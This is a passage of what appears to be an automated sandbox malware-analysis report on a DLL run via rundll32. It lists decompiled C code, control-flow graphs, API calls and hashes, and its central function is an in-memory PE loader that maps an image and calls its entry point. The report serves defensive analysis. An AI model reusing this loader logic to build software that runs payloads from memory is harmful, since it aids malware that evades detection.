                                                                                                                                                            • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,-100510CC,00000040), ref: 100127D1
                                                                                                                                                            • _malloc.LIBCMT ref: 100127F5
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.532303320.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 0000000B.00000002.532295709.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532368497.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532385736.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532394465.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532402551.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                                                            • String ID: .$.$2$3$6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0$DASHBOARD$d$d$e$kre3.l$l$l$l$l$l$l$l$n$ndldl
                                                                                                                                                            • API String ID: 572389289-2839844625
                                                                                                                                                            • Opcode ID: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                                                            • Instruction ID: 8f66a7c676ce8d0fa2ca8bd8519024a549b55f77dd79b918ae70bd0eec3b217e
                                                                                                                                                            • Opcode Fuzzy Hash: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                                                            • Instruction Fuzzy Hash: FB613EB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10002280 Relevance: 22.8, APIs: 15, Instructions: 331COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 36 10002280-100022a7 call 10001990 39 100022b0-100022c1 36->39 40 100022a9-100022ab 36->40 42 100022c3-100022d0 SetLastError 39->42 43 100022d5-100022f0 call 10001990 39->43 41 1000269a-1000269d 40->41 42->41 46 100022f2-100022f4 43->46 47 100022f9-1000230e 43->47 46->41 48 10002310-1000231d SetLastError 47->48 49 10002322-1000232f 47->49 48->41 50 10002331-1000233e SetLastError 49->50 51 10002343-1000234c 49->51 50->41 52 10002360-10002381 51->52 53 1000234e-1000235b SetLastError 51->53 54 10002395-1000239f 52->54 53->41 55 100023a1-100023a8 54->55 56 100023d7-10002412 GetNativeSystemInfo 54->56 57 100023b8-100023c4 55->57 58 100023aa-100023b6 55->58 59 10002414-10002421 SetLastError 56->59 60 10002426-10002445 VirtualAlloc 56->60 61 100023c7-100023cd 57->61 58->61 59->41 62 10002472-1000248a GetProcessHeap HeapAlloc 60->62 63 10002447-10002461 VirtualAlloc 60->63 64 100023d5 61->64 65 100023cf-100023d2 61->65 67 100024ac-10002510 call 10001990 62->67 68 1000248c-100024a7 VirtualFree SetLastError 62->68 63->62 66 10002463-1000246d SetLastError 63->66 64->54 65->64 66->41 72 10002512 67->72 73 1000251c-10002581 VirtualAlloc call 10001810 call 100019c0 67->73 68->41 74 1000268c-10002698 call 10002840 72->74 81 10002583 73->81 82 1000258d-1000259e 73->82 74->41 81->74 83 100025a0-100025b6 call 10001eb0 82->83 84 100025b8-100025bb 82->84 86 100025c2-100025d0 call 10001ff0 83->86 84->86 90 100025d2 86->90 91 100025dc-100025ea call 10001cb0 86->91 90->74 94 100025f6-10002604 call 10001e30 91->94 95 100025ec 91->95 98 10002606 94->98 99 1000260d-10002616 94->99 95->74 98->74 100 10002618-1000261f 99->100 101 1000267d-10002680 99->101 103 10002621-10002643 call 27e991 100->103 104 1000266a-10002678 100->104 102 10002687-1000268a 101->102 102->41 106 10002646-1000264d 103->106 105 1000267b 104->105 105->102 107 1000265e-10002668 106->107 108 1000264f-1000265a SetLastError 106->108 107->105 108->74
                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                            			E10002280(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v8;
				void* _v12;
				signed short* _v16;
				void* _v20;
				void* _v24;
				long _v28;
				signed int _v32;
				intOrPtr _v64;
				char _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr* _v80;
				intOrPtr _v84;
				void* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				void* _t180;
				void* _t191;
				void* _t198;
				void* _t202;
				intOrPtr _t209;
				void* _t220;
				intOrPtr _t269;
				intOrPtr _t278;
				intOrPtr _t326;

				_v100 = __ecx;
				_v72 = 0;
				_v20 = 0;
				if(E10001990(_v100, _a8, 0x40) != 0) {
					_v16 = _a4;
					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
						_t10 =  &(_v16[0x1e]); // 0xfffefe57
						if(E10001990(_v100, _a8,  *_t10 + 0xf8) != 0) {
							_t15 =  &(_v16[0x1e]); // 0xfffefe57
							_v80 = _a4 +  *_t15;
							if( *_v80 == 0x4550) {
								if(( *(_v80 + 4) & 0x0000ffff) == 0x14c) {
									if(( *(_v80 + 0x38) & 0x00000001) == 0) {
										_v84 = _v80 + ( *(_v80 + 0x14) & 0x0000ffff) + 0x18;
										_v32 =  *(_v80 + 0x38);
										_v12 = 0;
										while(_v12 < ( *(_v80 + 6) & 0x0000ffff)) {
											if( *((intOrPtr*)(_v84 + 0x10)) != 0) {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) +  *((intOrPtr*)(_v84 + 0x10));
											} else {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) + _v32;
											}
											if(_v88 > _v20) {
												_v20 = _v88;
											}
											_v12 = _v12 + 1;
											_v84 = _v84 + 0x28;
										}
										__imp__GetNativeSystemInfo( &_v68); // executed
										_t59 = _v64 - 1; // 0x71
										_v28 =  *((intOrPtr*)(_v80 + 0x50)) + _t59 &  !(_v64 - 1);
										_t65 = _v64 - 1; // -1
										if(_v28 == (_v20 + _t65 &  !(_v64 - 1))) {
											_t180 = VirtualAlloc( *(_v80 + 0x34), _v28, 0x3000, 4); // executed
											_v24 = _t180;
											if(_v24 != 0) {
												L26:
												_v72 = HeapAlloc(GetProcessHeap(), 8, 0x34);
												if(_v72 != 0) {
													 *((intOrPtr*)(_v72 + 4)) = _v24;
													asm("sbb edx, edx");
													 *(_v72 + 0x14) =  ~( ~( *(_v80 + 0x16) & 0x2000));
													 *((intOrPtr*)(_v72 + 0x1c)) = _a12;
													 *((intOrPtr*)(_v72 + 0x20)) = _a16;
													 *((intOrPtr*)(_v72 + 0x24)) = _a20;
													 *((intOrPtr*)(_v72 + 0x28)) = _a24;
													 *((intOrPtr*)(_v72 + 0x30)) = _v64;
													if(E10001990(_v100, _a8,  *(_v80 + 0x54)) != 0) {
														_t191 = VirtualAlloc(_v24,  *(_v80 + 0x54), 0x1000, 4); // executed
														_v8 = _t191;
														E10001810(_v8, _v16,  *(_v80 + 0x54));
														_t115 =  &(_v16[0x1e]); // 0xfffefe57
														 *_v72 = _v8 +  *_t115;
														 *((intOrPtr*)( *_v72 + 0x34)) = _v24;
														_t198 = E100019C0(_v100, _a4, _a8, _v80, _v72); // executed
														if(_t198 != 0) {
															_t269 =  *((intOrPtr*)( *_v72 + 0x34)) -  *(_v80 + 0x34);
															_v76 = _t269;
															if(_t269 == 0) {
																 *((intOrPtr*)(_v72 + 0x18)) = 1;
															} else {
																 *((intOrPtr*)(_v72 + 0x18)) = E10001EB0(_v100, _v72, _v76);
															}
															if(E10001FF0(_v100, _v72) != 0) {
																_t202 = E10001CB0(_v100, _v72); // executed
																if(_t202 != 0) {
																	if(E10001E30(_v100, _v72) != 0) {
																		if( *((intOrPtr*)( *_v72 + 0x28)) == 0) {
																			 *(_v72 + 0x2c) = 0;
																			L49:
																			return _v72;
																		}
																		if( *(_v72 + 0x14) == 0) {
																			 *(_v72 + 0x2c) = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
																			L47:
																			goto L49;
																		}
																		_v96 = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
																		_t209 =  *0x10055a88; // 0x0
																		_t278 =  *0x10055a84; // 0x1
																		_t326 =  *0x10055a80; // 0x10000000
																		_v92 = _v96(_t326, _t278, _t209);
																		if(_v92 != 0) {
																			 *((intOrPtr*)(_v72 + 0x10)) = 1;
																			goto L47;
																		}
																		SetLastError(0x45a);
																		L50:
																		E10002840(_v100, _v72);
																		return 0;
																	}
																	goto L50;
																}
																goto L50;
															}
															goto L50;
														}
														goto L50;
													}
													goto L50;
												}
												VirtualFree(_v24, 0, 0x8000);
												SetLastError(0xe);
												return 0;
											}
											_t220 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
											_v24 = _t220;
											if(_v24 != 0) {
												goto L26;
											}
											SetLastError(0xe);
											return 0;
										}
										SetLastError(0xc1);
										return 0;
									}
									SetLastError(0xc1);
									return 0;
								}
								SetLastError(0xc1);
								return 0;
							}
							SetLastError(0xc1);
							return 0;
						}
						return 0;
					}
					SetLastError(0xc1);
					return 0;
				}
				return 0;
			}





























                                                                                                                                                            0x10002286
                                                                                                                                                            0x10002289
                                                                                                                                                            0x10002290
                                                                                                                                                            0x100022a7
                                                                                                                                                            0x100022b3
                                                                                                                                                            0x100022c1
                                                                                                                                                            0x100022d8
                                                                                                                                                            0x100022f0
                                                                                                                                                            0x100022ff
                                                                                                                                                            0x10002302
                                                                                                                                                            0x1000230e
                                                                                                                                                            0x1000232f
                                                                                                                                                            0x1000234c
                                                                                                                                                            0x1000236e
                                                                                                                                                            0x10002377
                                                                                                                                                            0x1000237a
                                                                                                                                                            0x10002395
                                                                                                                                                            0x100023a8
                                                                                                                                                            0x100023c4
                                                                                                                                                            0x100023aa
                                                                                                                                                            0x100023b3
                                                                                                                                                            0x100023b3
                                                                                                                                                            0x100023cd
                                                                                                                                                            0x100023d2
                                                                                                                                                            0x100023d2
                                                                                                                                                            0x10002389
                                                                                                                                                            0x10002392
                                                                                                                                                            0x10002392
                                                                                                                                                            0x100023db
                                                                                                                                                            0x100023ea
                                                                                                                                                            0x100023f8
                                                                                                                                                            0x10002401
                                                                                                                                                            0x10002412
                                                                                                                                                            0x10002438
                                                                                                                                                            0x1000243e
                                                                                                                                                            0x10002445
                                                                                                                                                            0x10002472
                                                                                                                                                            0x10002483
                                                                                                                                                            0x1000248a
                                                                                                                                                            0x100024b2
                                                                                                                                                            0x100024c4
                                                                                                                                                            0x100024cb
                                                                                                                                                            0x100024d4
                                                                                                                                                            0x100024dd
                                                                                                                                                            0x100024e6
                                                                                                                                                            0x100024ef
                                                                                                                                                            0x100024f8
                                                                                                                                                            0x10002510
                                                                                                                                                            0x1000252e
                                                                                                                                                            0x10002534
                                                                                                                                                            0x10002546
                                                                                                                                                            0x10002554
                                                                                                                                                            0x1000255a
                                                                                                                                                            0x10002564
                                                                                                                                                            0x1000257a
                                                                                                                                                            0x10002581
                                                                                                                                                            0x10002598
                                                                                                                                                            0x1000259b
                                                                                                                                                            0x1000259e
                                                                                                                                                            0x100025bb
                                                                                                                                                            0x100025a0
                                                                                                                                                            0x100025b3
                                                                                                                                                            0x100025b3
                                                                                                                                                            0x100025d0
                                                                                                                                                            0x100025e3
                                                                                                                                                            0x100025ea
                                                                                                                                                            0x10002604
                                                                                                                                                            0x10002616
                                                                                                                                                            0x10002680
                                                                                                                                                            0x10002687
                                                                                                                                                            0x00000000
                                                                                                                                                            0x10002687
                                                                                                                                                            0x1000261f
                                                                                                                                                            0x10002678
                                                                                                                                                            0x1000267b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x1000267b
                                                                                                                                                            0x1000262c
                                                                                                                                                            0x1000262f
                                                                                                                                                            0x10002635
                                                                                                                                                            0x1000263c
                                                                                                                                                            0x10002646
                                                                                                                                                            0x1000264d
                                                                                                                                                            0x10002661
                                                                                                                                                            0x00000000
                                                                                                                                                            0x10002661
                                                                                                                                                            0x10002654
                                                                                                                                                            0x1000268c
                                                                                                                                                            0x10002693
                                                                                                                                                            0x00000000
                                                                                                                                                            0x10002698
                                                                                                                                                            0x00000000
                                                                                                                                                            0x10002606
                                                                                                                                                            0x00000000
                                                                                                                                                            0x100025ec
                                                                                                                                                            0x00000000
                                                                                                                                                            0x100025d2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x10002583
                                                                                                                                                            0x00000000
                                                                                                                                                            0x10002512
                                                                                                                                                            0x10002497
                                                                                                                                                            0x1000249f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x100024a5
                                                                                                                                                            0x10002454
                                                                                                                                                            0x1000245a
                                                                                                                                                            0x10002461
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x10002465
                                                                                                                                                            0x00000000
                                                                                                                                                            0x1000246b
                                                                                                                                                            0x10002419
                                                                                                                                                            0x00000000
                                                                                                                                                            0x1000241f
                                                                                                                                                            0x10002353
                                                                                                                                                            0x00000000
                                                                                                                                                            0x10002359
                                                                                                                                                            0x10002336
                                                                                                                                                            0x00000000
                                                                                                                                                            0x1000233c
                                                                                                                                                            0x10002315
                                                                                                                                                            0x00000000
                                                                                                                                                            0x1000231b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x100022f2
                                                                                                                                                            0x100022c8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x100022ce
                                                                                                                                                            0x00000000

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                                                            • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.532303320.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 0000000B.00000002.532295709.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532368497.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532385736.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532394465.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532402551.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                            • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                                                            • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                                                            • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                                                            • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10006A90 Relevance: 18.4, APIs: 1, Instructions: 16933COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                                                            APIs
                                                                                                                                                            • _malloc.LIBCMT ref: 10006A9C
                                                                                                                                                              • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                                                              • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                                                              • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.532303320.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 0000000B.00000002.532295709.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532368497.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532385736.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532394465.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532402551.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateHeap_malloc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 501242067-0
                                                                                                                                                            • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                                                            • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                                                            • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                                                            • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1002083B Relevance: 16.6, APIs: 11, Instructions: 103memoryCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                                                            • GlobalHandle.KERNEL32(003B7AD0), ref: 100208A9
                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                                                            • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                                                            • GlobalHandle.KERNEL32(003B7AD0), ref: 100208DB
                                                                                                                                                            • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                                                            • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                                                            • _memset.LIBCMT ref: 10020911
                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.532303320.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 0000000B.00000002.532295709.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532368497.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532385736.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532394465.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532402551.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 496899490-0
                                                                                                                                                            • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                                                            • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                                                            • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                                                            • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1002FA69 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • __lock.LIBCMT ref: 1002FA87
                                                                                                                                                              • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                                                              • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                                                              • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                                                            • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                                                            • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                                                            • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.532303320.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 0000000B.00000002.532295709.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532368497.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532385736.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532394465.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532402551.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2714421763-0
                                                                                                                                                            • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                                                            • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                                                            • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                                                            • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10036624 Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 235 10036624-10036642 HeapCreate 236 10036647-10036654 call 100365c9 235->236 237 10036644-10036646 235->237 240 10036656-10036663 call 10035aca 236->240 241 1003667a-1003667d 236->241 240->241 244 10036665-10036678 HeapDestroy 240->244 244->237
                                                                                                                                                            APIs
                                                                                                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                                                            • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.532303320.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 0000000B.00000002.532295709.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532368497.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532385736.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532394465.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532402551.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$CreateDestroy
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3296620671-0
                                                                                                                                                            • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                                                            • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                                                            • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                                                            • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 100019C0 Relevance: 2.6, APIs: 2, Instructions: 115memoryCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 245 100019c0-100019ee 246 10001a02-10001a0e 245->246 247 10001a14-10001a1b 246->247 248 10001b06 246->248 249 10001a83-10001a9e call 10001990 247->249 250 10001a1d-10001a2a 247->250 251 10001b0b-10001b0e 248->251 260 10001aa0-10001aa2 249->260 261 10001aa4-10001ac9 VirtualAlloc 249->261 253 10001a2c-10001a4e VirtualAlloc 250->253 254 10001a7e 250->254 257 10001a50-10001a52 253->257 258 10001a57-10001a7b call 100017c0 253->258 254->246 257->251 258->254 260->251 263 10001acb-10001acd 261->263 264 10001acf-10001afe call 10001810 261->264 263->251 264->248
                                                                                                                                                            APIs
                                                                                                                                                            • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                                                            • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.532303320.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 0000000B.00000002.532295709.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532368497.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532385736.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
